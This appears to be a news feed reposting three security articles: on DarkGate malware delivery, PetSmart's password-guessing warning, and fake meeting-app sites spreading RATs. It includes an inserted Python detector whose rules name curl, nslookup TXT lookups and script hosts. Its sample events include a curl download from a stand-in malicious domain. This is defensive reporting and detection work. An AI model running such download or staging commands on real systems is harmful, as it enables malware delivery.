
tresronours@parlote.facil.services

DarkGate Malware Abusing Cloud Storage & SEO Following Delivery Over Teams

DarkGate loader delivery surged after the Qakbot takedown, with financially motivated actors like TA577 and ransomware groups (BianLian, Black Basta) using it to target financial institutions (US, Europe) for double extortion.

It establishes an initial foothold and deploys info-stealers, ransomware, and remote access tools to maximize data exfiltration and extortion gains by utilizing legitimate channels (DoubleClick ads, cloud storage) and phishing emails for distribution.

Overview of DarkGate version 5 activity

Similarities with IcedID delivery methods suggest that threat actors may be cooperating or sharing their tradecraft.


DarkGate is a malware-as-a-service first advertised in June 2023 that offers remote access, data theft, and privilege escalation, and relies on several evasion techniques, including a custom crypter, polymorphism, and anti-VM checks.

Persona RastaFarEye is advertising DarkGate on a cybercrime forum.

It also utilizes LOLBAS tools to download a malicious AutoIt script that decrypts the DarkGate payload, injects it into a process, and establishes persistence through registry keys and a rootkit module.

DarkGate infection chain through PDF lure.

Attackers primarily target financial institutions like BDK, a major German bank, using phishing emails with lures relevant to the target’s industry and delivering the DarkGate payload through embedded links in PDF attachments.

The delivered malicious PDF attachment targeted the BDK.

The links redirect victims to download pages hosted on compromised websites.

To evade detection, DarkGate operators have incorporated innovative techniques like abusing DNS TXT records to execute malicious Windows commands that download and install the malware.

Malware delivery similarities between DarkGate and IcedID.

EclecticIQ analysts compared DarkGate and IcedID malware, finding shared tactics like obfuscated strings, using PING.exe to check internet connectivity, CURL.exe for downloading payloads, and decoy PDF documents.

They differed in execution tools (DarkGate: Cscript.exe, IcedID: Rundll32.exe) and payload types (DarkGate: VBS script, IcedID: disguised DLL).

Example of DoubleClick Ad service abuse.

For DarkGate delivery, attackers abused open redirects in Google’s DoubleClick ads with emails containing links disguised as invoices.

Since January 2024, DarkGate has shifted to CAB and MSI formats, likely to evade detection.

DarkGate version 6.1.6 employs DLL side-loading for evasion, where a malicious DLL is loaded into legitimate applications (e.g., VLC, iTunesHelper) through a compromised MSI installer.

Dropped DarkGate payloads

The loader then decrypts itself using a key stored inside a fake sqlite3.dll and drops a script into C:\temp; that script is decrypted again with a separate key before the final DarkGate payload is launched.

Decrypted configuration reveals the command-and-control server.

This version also introduces a new configuration decryption routine that uses XOR encryption to hide the C2 server address and other operational parameters, which makes signature-based detection harder.

DarkGate is a Malware-as-a-Service (MaaS) that steals information like usernames, CPU information, and anti-virus information from the victim device after gaining an initial foothold.

Decrypted C2 activity showing the version of DarkGate.

It then uses Living Off the Land Binaries (LOLBAS) like wscript.exe and cscript.exe to execute a VBS script.

BianLian ransomware attack chain using DarkGate.

Network traffic analysis can surface suspicious patterns such as downloads from unusual domains or unexpected Curl.exe activity, and YARA rules can be used to detect the final payload on an infected device.

The IOCs include suspicious user agent strings, command and control (C2) server domains, payload downloader URLs with malicious zip files, and multiple file hashes, which can be used to identify infected systems, block malicious traffic, and improve threat detection.
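The detection approach described above, as an added example that is not code from the article or from EclecticIQ: a small rule set run over constructed Sysmon-style process-creation events, flagging the LOLBAS behaviours the article names (script hosts running VBS, PING.exe and CURL.exe spawned by those hosts, downloads from domains outside an allowlist, and command-line DNS TXT lookups). The event fields, the allowlist and the sample domains are assumptions.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent: str     # parent process image name (assumed field)
    image: str      # created process image name (assumed field)
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBAS_CHILDREN = {"curl.exe", "ping.exe", "nslookup.exe", "autoit3.exe"}
# Hypothetical allowlist of domains curl.exe is expected to contact.
KNOWN_GOOD_DOMAINS = {"updates.example-corp.internal", "packages.microsoft.com"}
URL_RE = re.compile(r"https?://([a-z0-9.-]+)")


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection tags that apply to one process-creation event."""
    tags = []
    image, parent, cl = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    if image in SCRIPT_HOSTS and ".vbs" in cl:
        tags.append("script_host_runs_vbs")
    if parent in SCRIPT_HOSTS and image in LOLBAS_CHILDREN:
        tags.append("script_host_spawns_" + image.removesuffix(".exe"))
    if image == "curl.exe":
        for domain in URL_RE.findall(cl):
            if domain not in KNOWN_GOOD_DOMAINS:
                tags.append("curl_unusual_domain:" + domain)
    if image == "nslookup.exe" and ("-type=txt" in cl or "-q=txt" in cl):
        tags.append("dns_txt_lookup_from_cli")
    return tags


def scan(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Collect tags per host; a host with two or more distinct tags is flagged."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev.host].update(classify(ev))
    return {h: sorted(t) for h, t in per_host.items() if len(t) >= 2}


# Constructed sample telemetry (not real indicators): WS01 mimics the chain
# described in the article, WS02 is a benign package download.
SAMPLE = [
    ProcEvent("WS01", "explorer.exe", "cscript.exe", r"cscript.exe C:\temp\invoice.vbs"),
    ProcEvent("WS01", "cscript.exe", "ping.exe", "ping.exe -n 1 8.8.8.8"),
    ProcEvent("WS01", "cscript.exe", "curl.exe",
              "curl.exe http://cdn.example-bad.test/x.zip -o C:\\temp\\x.zip"),
    ProcEvent("WS01", "cscript.exe", "nslookup.exe", "nslookup -type=txt stage.example-bad.test"),
    ProcEvent("WS02", "powershell.exe", "curl.exe",
              "curl.exe https://packages.microsoft.com/keys/x.asc -o k.asc"),
]

if __name__ == "__main__":
    for host, tags in scan(SAMPLE).items():
        print(host, tags)
```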

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post DarkGate Malware Abusing Cloud Storage & SEO Following Delivery Over Teams appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder


PetSmart warns of Active Password Cracking Attacks

PetSmart, Inc. is a renowned retail chain operating in the United States, Canada, and Puerto Rico.

It offers a comprehensive range of pet products and services such as pet supplies, grooming, training, and in-store adoptions.

PetSmart prides itself on being a trusted partner to pet parents and a dedicated advocate for pets’ well-being.

PetSmart has issued a warning regarding an uptick in password-guessing attempts on their website.

The pet retail giant reassures that there has been no breach of their systems, but the increased activity has prompted them to take precautionary measures.

Security Measures in Place

PetSmart’s vigilant security tools detected the unusual activity, which led to the company’s decision to deactivate the passwords of potentially affected accounts.


Customers will need to reset their passwords the next time they attempt to log in to petsmart.com.

The company has provided straightforward instructions for the password reset: users can click the “forgot password” link on the login page or navigate directly to www.petsmart.com/account/ to initiate the process.

A Call for Stronger Password Hygiene

The PetSmart Data Security Team emphasizes the importance of robust password practices in the face of persistent threats from online fraudsters.

These malicious actors are known to obtain usernames and passwords and test them across various platforms, including those like PetSmart’s.

According to a recent tweet by Dark Web Informer, PetSmart has notified its customers about a security breach in its system via email.

@PetSmart sent out the following email. #Ransomware #DarkWebInformer #Cybersecurity #Cyberattack #Cybercrime #PetSmart pic.twitter.com/Rib9SHtcaD — Dark Web Informer (@DarkWebInformer), March 6, 2024 (https://twitter.com/DarkWebInformer/status/1765476096760262942)

To combat this, the retailer advises customers to create strong, unique passwords for their accounts and to update them several times a year.

The use of different passwords for separate important accounts is also strongly recommended.

Understanding the inconvenience this may cause to their patrons, PetSmart extends its customer service support for any questions or concerns arising from this issue.

Customers can reach out via email at customercare@petsmart.com.

Maintaining Vigilance

PetSmart’s prompt response to the detected password-cracking attempts is part of its ongoing commitment to customer data security.

The company’s efforts to communicate with its customers about the potential risks and the steps being taken to mitigate them reflect an industry-wide push towards greater transparency and proactive security measures in the digital age.


The post PetSmart warns of Active Password Cracking Attacks appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

Hackers use Zoom & Google Meet to Attack Android & Windows users

A threat actor has been identified as creating fraudulent Skype, Google Meet, and Zoom websites to distribute malware, explicitly targeting Android and Windows users.

This article delves into the details of this malicious campaign and explains how users can identify and protect themselves from these threats.

Attack Sequence:

A threat actor distributes various malware families through fake Skype, Zoom, and Google Meet websites.

Remote Access Trojans (RATs) such as SpyNote RAT for Android, and NjRAT and DCRat for Windows, are being distributed.


The attacker utilized shared web hosting with all fake sites hosted on a single IP address in Russia.

Malicious URLs closely resemble legitimate websites, making it challenging for users to differentiate.

Attack chain and execution flow for Android and Windows campaigns (source: Zscaler)

The attacker’s modus operandi involves luring users to click on fake sites where clicking on the Android button initiates the download of a malicious APK file, while clicking on the Windows button triggers the download of a BAT file, leading to a RAT payload download.

Rest assured that Zscaler’s ThreatLabz team diligently monitors and shares expert insights on all potential threats to keep you and the wider community safe.

Skype:

The first fake site discovered was join-skype[.]info, designed to deceive users into downloading a fake Skype application.

The Windows button is directed to Skype8.exe and the Google Play button is pointed at Skype.apk.

The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain. (Source: urlscan.io)

Google Meet:

Another fake site, online-cloudmeeting[.]pro, mimicking Google Meet, was identified. The site provided links to download fake Skype applications for Android and Windows.

The Windows link led to a BAT file downloading DCRat, while the Android link led to a SpyNote RAT APK file.

The fake Google Meet page, showing the fraudulent domain in the address bar; the fake Google Meet Windows application link points to a malicious BAT file that downloads and executes malware. (Source: Zscaler)

Zoom:

Later, a fake Zoom site, us06webzoomus[.]pro, emerged with links to download SpyNote RAT for Android and DCRat for Windows.

The site closely resembled a legitimate Zoom meeting ID.

The fake Zoom page, showing a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file containing SpyNote RAT when the Google Play button is clicked. (Source: Zscaler)

Open Directories:

The fake Google Meet and Zoom sites also contained additional malicious files like driver.exe and meet.exe (NjRAT), indicating potential future campaigns utilizing these files.

Example of additional malicious files hosted on the websites hosting fake online meeting applications. (Source: Zscaler)

Businesses are at risk of impersonation attacks through online meeting applications, leading to the distribution of RATs that can compromise sensitive data.

Vigilance, robust security measures, and regular updates and patches are crucial for safeguarding against these threats, and proactive measures become more important as the threats evolve.

Zscaler’s ThreatLabz team remains dedicated to monitoring these threats and sharing insights with the community.


The post Hackers use Zoom & Google Meet to Attack Android & Windows users appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.